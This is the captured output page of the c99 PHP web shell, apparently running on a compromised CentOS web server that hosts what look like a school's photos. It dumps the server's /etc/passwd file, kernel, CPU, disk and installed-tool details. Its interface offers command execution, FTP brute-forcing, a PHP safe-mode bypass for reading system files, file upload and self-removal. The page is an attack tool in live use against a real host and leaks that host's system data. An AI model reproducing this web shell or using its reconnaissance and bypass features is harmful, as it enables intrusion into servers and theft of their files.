!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/omf/accessx-status/   drwxr-xr-x
Free 50.95 GB of 127.8 GB (39.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Server security information:
Open base dir: OFF (not secure)
*nix /etc/passwd:
From:  To:  

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
Syslog configuration (syslog.conf)
Hosts
OS Version? - Linux version 2.6.18-194.el5PAE (mockbuild@builder16.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Fri Apr 2 15:37:44 EDT 2010
Kernel version? - net.ipv6.conf.eth0.force_mld_version = 0
net.ipv6.conf.default.force_mld_version = 0
net.ipv6.conf.all.force_mld_version = 0
net.ipv6.conf.lo.force_mld_version = 0
net.ipv4.conf.eth0.force_igmp_version = 0
net.ipv4.conf.lo.force_igmp_version = 0
net.ipv4.conf.default.force_igmp_version = 0
net.ipv4.conf.all.force_igmp_version = 0
kernel.version = #1 SMP Fri Apr 2 15:37:44 EDT 2010
Distrib name - CentOS release 5.5 (Final)
Kernel \r on an \m
CPU? - processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Xeon(R) CPU E5506 @ 2.13GHz
stepping : 5
cpu MHz : 1596.000
cache size : 4096 KB
physical id : 0
siblings : 4
core id : 0
cpu cores : 4
apicid : 0
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc nonstop_tsc pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr sse4_1 sse4_2 popcnt lahf_lm [8]
bogomips : 4266.94

processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Xeon(R) CPU E5506 @ 2.13GHz
stepping : 5
cpu MHz : 2128.000
cache size : 4096 KB
physical id : 0
siblings : 4
core id : 1
cpu cores : 4
apicid : 2
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc nonstop_tsc pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr sse4_1 sse4_2 popcnt lahf_lm [8]
bogomips : 4266.80

processor : 2
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Xeon(R) CPU E5506 @ 2.13GHz
stepping : 5
cpu MHz : 1596.000
cache size : 4096 KB
physical id : 0
siblings : 4
core id : 2
cpu cores : 4
apicid : 4
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc nonstop_tsc pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr sse4_1 sse4_2 popcnt lahf_lm [8]
bogomips : 4266.79

processor : 3
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Xeon(R) CPU E5506 @ 2.13GHz
stepping : 5
cpu MHz : 1596.000
cache size : 4096 KB
physical id : 0
siblings : 4
core id : 3
cpu cores : 4
apicid : 6
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc nonstop_tsc pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr sse4_1 sse4_2 popcnt lahf_lm [8]
bogomips : 4266.80

processor : 4
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Xeon(R) CPU E5506 @ 2.13GHz
stepping : 5
cpu MHz : 1596.000
cache size : 4096 KB
physical id : 1
siblings : 4
core id : 0
cpu cores : 4
apicid : 16
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc nonstop_tsc pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr sse4_1 sse4_2 popcnt lahf_lm [8]
bogomips : 4266.84

processor : 5
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Xeon(R) CPU E5506 @ 2.13GHz
stepping : 5
cpu MHz : 1596.000
cache size : 4096 KB
physical id : 1
siblings : 4
core id : 1
cpu cores : 4
apicid : 18
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc nonstop_tsc pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr sse4_1 sse4_2 popcnt lahf_lm [8]
bogomips : 4266.83

processor : 6
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Xeon(R) CPU E5506 @ 2.13GHz
stepping : 5
cpu MHz : 1596.000
cache size : 4096 KB
physical id : 1
siblings : 4
core id : 2
cpu cores : 4
apicid : 20
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc nonstop_tsc pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr sse4_1 sse4_2 popcnt lahf_lm [8]
bogomips : 4266.84

processor : 7
vendor_id : GenuineIntel
cpu family : 6
model : 26
model name : Intel(R) Xeon(R) CPU E5506 @ 2.13GHz
stepping : 5
cpu MHz : 1596.000
cache size : 4096 KB
physical id : 1
siblings : 4
core id : 3
cpu cores : 4
apicid : 22
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 11
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc nonstop_tsc pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr sse4_1 sse4_2 popcnt lahf_lm [8]
bogomips : 4266.85

RAM - total used free shared buffers cached
Mem: 8095 5459 2636 0 429 4355
-/+ buffers/cache: 674 7421
Swap: 3999 0 3999
HDD space - Filesystem Size Used Avail Use% Mounted on
/dev/mapper/VolGroup00-LogVol00
128G 71G 51G 58% /
/dev/sda1 99M 13M 82M 13% /boot
tmpfs 4.0G 0 4.0G 0% /dev/shm
List of Attributes - ------------- ./IMG_0508.JPG
------------- ./DSC05739.JPG
------------- ./20170127215255.jpg
------------- ./IMG_6742.JPG
------------- ./Garden A-B.jpg
------------- ./IMG_6798.JPG
------------- ./DSC05746.JPG
------------- ./IMG_9196 (1).JPG
------------- ./DSC00146.jpg
------------- ./DSC05704.JPG
------------- ./PICT0101.jpg
------------- ./DSC05731.JPG
------------- ./20170219095119.jpg
------------- ./IMG_8184.jpg
------------- ./IMG_4311.JPG
------------- ./20170219114219.JPG
------------- ./Untitled.jpg
------------- ./S__7315507.jpg
------------- ./IMG_2084.JPG
------------- ./IMG_8182.jpg
------------- ./Thumbs.db
------------- ./IMG_6778.JPG
------------- ./DSC05685.JPG
------------- ./Covered walkways1.jpg
------------- ./IMG_8181.jpg
------------- ./20170219134021.JPG
------------- ./IMG_9196.jpg
------------- ./IMG_6799.JPG
------------- ./PICT0103.jpg
----------I-- ./..
------------- ./index.php
------------- ./DSC05756.JPG
------------- ./IMG_8183.jpg
------------- ./DSC05737.JPG
------------- ./IMG_0523.JPG
------------- ./PICT0069.jpg
------------- ./20170219113749.jpg
------------- ./S__7315508.jpg
------------- ./20170123084849.JPG
------------- ./IMG_2608.JPG
------------- ./IMG_6779.JPG
------------- ./IMG_6729.JPG
------------- ./IMG_9163.JPG
------------- ./.
------------- ./DSC05749.JPG
------------- ./âç«èÍÁ.jpg
------------- ./IMG_0531.JPG
------------- ./IMG_0561.JPG
------------- ./auditorium.jpg
------------- ./20170127214913.jpg
------------- ./S__7315503.jpg
------------- ./School Building-B.jpg
------------- ./6c.php
------------- ./DSC03730.jpg
------------- ./IMG_0525.JPG
------------- ./20170210110543.JPG
------------- ./IMG_9021.jpg
------------- ./S__7315514.jpg
------------- ./IMG_9176.JPG
------------- ./20170217135149.jpg
------------- ./IMG_9151.JPG
------------- ./S__7315502.jpg
------------- ./IMG_6787.JPG
------------- ./School Building-A.jpg
------------- ./IMG_6788.JPG
------------- ./S__7315506.jpg
------------- ./IMG_6793.JPG
------------- ./DSC05736.JPG
------------- ./IMG_2941.JPG
------------- ./IMG_6794.JPG
------------- ./S__7315504.jpg
------------- ./IMG_0558.JPG
------------- ./S__7315505.jpg
------------- ./DSC08107.jpg
------------- ./20170217134042.JPG
------------- ./prittaraksa dorm.jpg
------------- ./IMG_8190.jpg
------------- ./DSC00105.jpg
------------- ./20170127210501.JPG
------------- ./DSC05750.JPG
------------- ./20170127215256.jpg
------------- ./S__7315509.jpg
------------- ./20170216141635.jpg
------------- ./IMG_6774.JPG
------------- ./IMG_0514.JPG
------------- ./IMG_9206.JPG
------------- ./DSC05764.JPG
------------- ./S__7315512.jpg
------------- ./IMG_0549.JPG
------------- ./IMG_6775.JPG
------------- ./teacher dorm2.jpg
------------- ./IMG_6783.JPG
------------- ./125555.jpg
------------- ./DSC00560.jpg
------------- ./DSC05774.JPG
Mount options - /dev/VolGroup00/LogVol00 / ext3 defaults 1 1
LABEL=/boot /boot ext3 defaults 1 2
tmpfs /dev/shm tmpfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
sysfs /sys sysfs defaults 0 0
proc /proc proc defaults 0 0
/dev/VolGroup00/LogVol01 swap swap defaults 0 0
Is cURL installed? - /usr/bin/curl
Is links installed? - /usr/bin/links
Is perl installed? - /usr/bin/perl
Where is apache - apache:
Where is perl? - perl: /usr/bin/perl /usr/share/man/man1/perl.1.gz
locate httpd.conf - /etc/httpd/conf/httpd.conf

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.48 ]--